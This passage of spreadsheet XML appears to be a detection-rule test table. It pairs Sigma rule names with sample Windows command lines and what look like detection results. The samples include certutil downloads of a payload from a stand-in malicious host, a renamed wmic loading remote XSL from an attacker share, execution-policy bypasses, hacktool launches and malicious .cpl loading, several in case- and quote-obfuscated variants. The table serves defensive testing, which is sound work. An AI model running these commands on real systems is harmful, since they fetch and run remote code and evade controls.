          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1954" s="43" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1954" s="43" t="n"/>
      <c r="J1954" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1954" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1955" ht="15.75" customHeight="1" s="42">
      <c r="A1955" s="43" t="n"/>
      <c r="B1955" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1955" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1955" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1955" s="43" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1955" s="43" t="n"/>
      <c r="J1955" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1955" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1956" ht="15.75" customHeight="1" s="42">
      <c r="A1956" s="43" t="n"/>
      <c r="B1956" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1956" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1956" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1956" s="43" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H1956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1956" s="43" t="n"/>
      <c r="J1956" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1956" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1957" ht="15.75" customHeight="1" s="42">
      <c r="A1957" s="43" t="n"/>
      <c r="B1957" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1957" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1957" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1957" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1957" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1957" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1957" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1957" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1957" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1958" ht="15.75" customHeight="1" s="42">
      <c r="A1958" s="43" t="n"/>
      <c r="B1958" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1958" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1958" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1958" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /"format:"\\AttackerServer\share\evil.xsl""</t>
        </is>
      </c>
      <c r="F1958" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1958" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1958" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1958" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1958" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1958" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1959" ht="15.75" customHeight="1" s="42">
      <c r="A1959" s="43" t="n"/>
      <c r="B1959" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1959" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1959" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1959" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /foRmAt:"\\AtTAckErsErVeR\sharE\eVil.xSl"</t>
        </is>
      </c>
      <c r="F1959" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1959" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1959" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1959" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1959" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1959" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1960" ht="15.75" customHeight="1" s="42">
      <c r="A1960" s="43" t="n"/>
      <c r="B1960" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1960" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1960" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1960" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FOrmAT:"\\aTtaCKerserVEr\shaRe\EVil.XSl"</t>
        </is>
      </c>
      <c r="F1960" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1960" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1960" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1960" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1960" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1960" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1961" ht="15.75" customHeight="1" s="42">
      <c r="A1961" s="43" t="n"/>
      <c r="B1961" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1961" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1961" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1961" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /FoRMAt:"\\ATTAcKeRSerVER\shaRE\eVIl.xSL"</t>
        </is>
      </c>
      <c r="F1961" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1961" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1961" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1961" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1961" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1961" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1962" ht="15.75" customHeight="1" s="42">
      <c r="A1962" s="43" t="n"/>
      <c r="B1962" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1962" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1962" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1962" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe -"node:127.0.0.1" process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1962" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1962" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1962" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1962" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1962" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1962" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1963" ht="15.75" customHeight="1" s="42">
      <c r="A1963" s="43" t="n"/>
      <c r="B1963" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1963" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1963" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1963" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NoDE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1963" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1963" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1963" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1963" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1963" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1963" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1964" ht="15.75" customHeight="1" s="42">
      <c r="A1964" s="43" t="n"/>
      <c r="B1964" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1964" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1964" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1964" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /NOdE:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F1964" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1964" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1964" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1964" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1964" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1964" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1965" ht="15.75" customHeight="1" s="42">
      <c r="A1965" s="43" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B1965" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C1965" s="36" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D1965" s="36" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E1965" s="36" t="inlineStr">
        <is>
          <t>takeown.exe -f C:\Users	haim\AppData\Local\Temp\T1222.001_takeown_folder -r</t>
        </is>
      </c>
      <c r="F1965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1965" s="43" t="n"/>
      <c r="J1965" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1965" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1966" ht="15.75" customHeight="1" s="42">
      <c r="A1966" s="43" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B1966" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C1966" s="36" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D1966" s="36" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E1966" s="43" t="inlineStr">
        <is>
          <t>takeown.exe "/f" C:\Users	haim\AppData\Local\Temp\T1222.001_takeown_folder "/r"</t>
        </is>
      </c>
      <c r="F1966" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1966" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1966" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1966" s="43" t="n"/>
      <c r="J1966" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1966" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1967" ht="15.75" customHeight="1" s="42">
      <c r="A1967" s="43" t="inlineStr">
        <is>
          <t>t1484.001</t>
        </is>
      </c>
      <c r="B1967" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_modify_group_policy_settings</t>
        </is>
      </c>
      <c r="C1967" s="36" t="inlineStr">
        <is>
          <t>Modify Group Policy Settings</t>
        </is>
      </c>
      <c r="D1967" s="36" t="inlineStr">
        <is>
          <t>ada4b0c4-758b-46ac-9033-9004613a150d</t>
        </is>
      </c>
      <c r="E1967" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKLM\S^OFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 10 /f</t>
        </is>
      </c>
      <c r="F1967" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1967" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1967" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1967" s="43" t="n"/>
      <c r="J1967" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1967" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1968" ht="15.75" customHeight="1" s="42">
      <c r="A1968" s="43" t="inlineStr">
        <is>
          <t>t1485</t>
        </is>
      </c>
      <c r="B1968" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_usage</t>
        </is>
      </c>
      <c r="C1968" s="36" t="inlineStr">
        <is>
          <t>Fsutil Suspicious Invocation</t>
        </is>
      </c>
      <c r="D1968" s="36" t="inlineStr">
        <is>
          <t>add64136-62e5-48ea-807e-88638d02df1e</t>
        </is>
      </c>
      <c r="E1968" s="43" t="inlineStr">
        <is>
          <t>notepad.exe</t>
        </is>
      </c>
      <c r="F1968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1968" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1968" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1968" s="43" t="n"/>
      <c r="J1968" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1968" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1969" ht="15.75" customHeight="1" s="42">
      <c r="A1969" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1969" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1969" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1969" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1969" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1969" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1969" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1969" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1969" s="43" t="n"/>
      <c r="J1969" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1969" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1970" ht="15.75" customHeight="1" s="42">
      <c r="A1970" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1970" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1970" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1970" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1970" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1970" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1970" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1970" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1970" s="43" t="n"/>
      <c r="J1970" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1970" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1971" ht="15.75" customHeight="1" s="42">
      <c r="A1971" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1971" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1971" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1971" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1971" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1971" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1971" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1971" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1971" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1971" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1971" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1972" ht="15.75" customHeight="1" s="42">
      <c r="A1972" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1972" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1972" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1972" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1972" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1972" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1972" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1972" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1972" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1972" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1972" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1973" ht="15.75" customHeight="1" s="42">
      <c r="A1973" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1973" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1973" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1973" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1973" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1973" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1973" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1973" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1973" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1973" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1973" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1974" ht="15.75" customHeight="1" s="42">
      <c r="A1974" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1974" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1974" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1974" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1974" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1974" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1974" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1974" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1974" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1974" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1974" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1975" ht="15.75" customHeight="1" s="42">
      <c r="A1975" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B1975" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1975" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1975" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1975" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1975" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1975" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1975" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1975" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1975" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1975" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1976" ht="15.75" customHeight="1" s="42">
      <c r="A1976" s="43" t="inlineStr">
        <is>
          <t>t1546</t>
        </is>
      </c>
      <c r="B1976" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C1976" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D1976" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E1976" s="43" t="inlineStr">
        <is>
          <t>control.exe C:\temp\System32\malicious.cpl</t>
        </is>
      </c>
      <c r="F1976" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1976" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1976" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1976" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J1976" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1976" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1977" ht="15.75" customHeight="1" s="42">
      <c r="A1977" s="36" t="inlineStr">
        <is>
          <t>t1546</t>
        </is>
      </c>
      <c r="B1977" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C1977" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D1977" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E1977" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe "C:\Users\Public\Downloads\malicious.cpl "</t>
        </is>
      </c>
      <c r="F1977" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1977" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1977" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1977" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J1977" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1977" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1978" ht="15.75" customHeight="1" s="42">
      <c r="A1978" s="43" t="inlineStr">
        <is>
          <t>t1546</t>
        </is>
      </c>
      <c r="B1978" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C1978" s="36" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D1978" s="36" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E1978" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe C:\Users\Public\Downloads\payload.dll</t>
        </is>
      </c>
      <c r="F1978" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1978" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1978" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1978" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J1978" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1978" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1979" ht="15.75" customHeight="1" s="42">
      <c r="A1979" s="36" t="n"/>
      <c r="B1979" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1979" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1979" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1979" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
